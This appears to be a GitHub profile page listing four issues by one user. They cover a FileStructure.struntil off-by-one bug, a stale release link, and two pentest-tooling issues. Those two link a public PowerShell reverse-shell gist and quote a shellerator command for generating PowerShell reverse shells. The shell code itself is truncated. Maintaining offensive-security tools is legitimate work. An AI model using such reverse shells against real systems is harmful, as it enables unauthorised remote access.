goreil

Results 4 issues of goreil

The function `FileStructure.struntil` returns one byte less for no apparent reason. For example, when I request `fp.struntil("flags")` I expect to get all 8 bytes of the flags struct. # Tested...

bug
backport-required

Basically just imported this reverse shell: https://gist.githubusercontent.com/egre55/c058744a4240af6515eb32b2d33fbed3/raw/3ad91872713d60888dca95850c3f6e706231cb40/powershell_reverse_shell.ps1 Demonstration using exegol:nightly that it works now. Attacker: ![image](https://github.com/user-attachments/assets/4b6b19ce-29b6-4521-9683-c422b09bf34d) Victim: ![image](https://github.com/user-attachments/assets/6b5d2afd-5954-4118-be2a-0b025b963ee2)

Both generated powershell reverse shells do not work: I used the following command to generate the reverse shells: ```bash # shellerator --type powershell --lport 443 --lhost 127.0.0.1 [1] powershell -NoP...

help wanted

The link should point to the releases of this fork instead of the original. At least I was really confused when I clicked the link and downloaded the wrong version.